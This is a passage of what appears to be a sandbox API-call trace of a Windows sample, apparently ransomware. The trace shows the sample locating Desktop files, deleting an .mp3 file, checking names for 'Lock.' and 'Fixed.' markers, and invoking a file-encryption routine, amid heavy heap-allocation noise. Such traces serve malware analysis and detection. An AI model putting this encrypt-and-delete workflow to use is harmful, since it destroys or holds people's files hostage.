hHeap=0x970000) returned 1 [0188.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0188.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0188.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0188.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0188.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0188.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0188.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0188.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0188.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0188.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0188.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0188.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0188.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0188.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0188.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0188.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0188.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0188.394] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0188.394] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.396] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0188.396] FreeLibrary (hLibModule=0x756e0000) returned 1 [0188.396] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0188.396] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0188.396] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0188.396] CloseHandle (hObject=0x2a0) returned 1 [0188.397] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0188.397] CloseHandle (hObject=0x2d0) returned 1 [0188.399] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0188.401] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0188.401] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0188.401] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/Ljw5WYRO6Wy.mp3", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Ljw5WYRO6Wy.mp3", lpFilePart=0x8cedf4*="Ljw5WYRO6Wy.mp3") returned 0x27 [0188.401] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\Ljw5WYRO6Wy.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\ljw5wyro6wy.mp3")) returned 0x20 [0188.481] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Ljw5WYRO6Wy.mp3", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x808ff990, ftCreationTime.dwHighDateTime=0x1d5e4f4, ftLastAccessTime.dwLowDateTime=0xa25dbf30, ftLastAccessTime.dwHighDateTime=0x1d5eae9, ftLastWriteTime.dwLowDateTime=0xa25dbf30, ftLastWriteTime.dwHighDateTime=0x1d5eae9, nFileSizeHigh=0x0, nFileSizeLow=0x1267, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="Ljw5WYRO6Wy.mp3", cAlternateFileName="LJW5WY~1.MP3")) returned 0xa87090 [0188.481] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\Ljw5WYRO6Wy.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\ljw5wyro6wy.mp3")) returned 1 [0188.556] FindNextFileW (in: hFindFile=0xa87090, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x808ff990, ftCreationTime.dwHighDateTime=0x1d5e4f4, ftLastAccessTime.dwLowDateTime=0xa25dbf30, ftLastAccessTime.dwHighDateTime=0x1d5eae9, ftLastWriteTime.dwLowDateTime=0xa25dbf30, ftLastWriteTime.dwHighDateTime=0x1d5eae9, nFileSizeHigh=0x0, nFileSizeLow=0x1267, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="Ljw5WYRO6Wy.mp3", cAlternateFileName="LJW5WY~1.MP3")) returned 0 [0188.556] FindClose (in: hFindFile=0xa87090 | out: hFindFile=0xa87090) returned 1 [0188.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0188.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0188.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0188.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0188.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0188.557] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 1 [0188.557] TranslateMessage (lpMsg=0x8cf968) returned 0 [0188.557] DispatchMessageW (lpMsg=0x8cf968) returned 0x0 [0188.557] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0188.557] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0188.557] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0188.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0188.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0188.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0188.557] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0188.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0188.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0188.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0188.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0188.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0188.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0188.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0188.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0188.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0188.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0188.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0188.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0188.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0188.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0188.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0188.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0188.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0188.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0188.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0188.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e563a8 [0188.558] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/Ljw5WYRO6Wy.mp3", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Ljw5WYRO6Wy.mp3", lpFilePart=0x8cf650*="Ljw5WYRO6Wy.mp3") returned 0x27 [0188.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0188.558] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\Ljw5WYRO6Wy.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\ljw5wyro6wy.mp3")) returned 0xffffffff [0188.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0188.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0188.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0188.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0188.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0188.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0188.559] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0188.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0188.559] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0188.559] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0188.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0188.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0188.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0188.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0188.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0188.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0188.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0188.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0188.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0188.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0188.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0188.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0188.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0188.560] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mfyUopWTtUAprVK7.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0188.560] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fyUopWTtUAprVK7.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0188.560] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yUopWTtUAprVK7.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0188.560] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UopWTtUAprVK7.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0188.560] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="opWTtUAprVK7.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0188.560] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pWTtUAprVK7.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0188.560] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WTtUAprVK7.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0188.560] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TtUAprVK7.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0188.560] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tUAprVK7.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0188.560] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UAprVK7.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0188.560] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AprVK7.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0188.560] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="prVK7.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0188.560] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rVK7.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0188.560] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VK7.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0188.560] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K7.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0188.560] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0188.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0188.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0188.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0188.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0188.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0188.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0188.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0188.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0188.561] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0188.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0188.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0188.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0188.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0188.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0188.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0188.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0188.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0188.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0188.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0188.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0188.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0188.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0188.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0188.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0188.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0188.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0188.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0188.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2a) returned 0x2e7fc70 [0188.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0188.561] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mfyUopWTtUAprVK7.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0188.561] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fyUopWTtUAprVK7.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0188.562] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yUopWTtUAprVK7.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0188.562] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UopWTtUAprVK7.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0188.562] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="opWTtUAprVK7.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0188.562] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pWTtUAprVK7.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0188.562] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WTtUAprVK7.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0188.562] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TtUAprVK7.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0188.562] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tUAprVK7.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0188.562] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UAprVK7.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0188.562] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AprVK7.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0188.562] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="prVK7.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0188.562] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rVK7.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0188.562] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VK7.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0188.562] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K7.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0188.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0188.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0188.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0188.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0188.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0188.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0188.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0188.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0188.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0188.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0188.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0188.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0188.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0188.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0188.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0188.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0188.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0188.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0188.563] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0188.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fff0 [0188.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0188.563] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0188.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fff0 | out: hHeap=0x970000) returned 1 [0188.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0188.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0188.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c38 [0188.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0188.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0188.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0188.563] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0188.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0188.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fca8 [0188.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0188.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0188.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0188.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0188.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0188.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fca8 | out: hHeap=0x970000) returned 1 [0188.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0188.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0188.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0188.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0188.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0188.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0188.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0188.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0188.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54be8 [0188.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0188.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0188.565] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0188.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0188.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff10 [0188.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 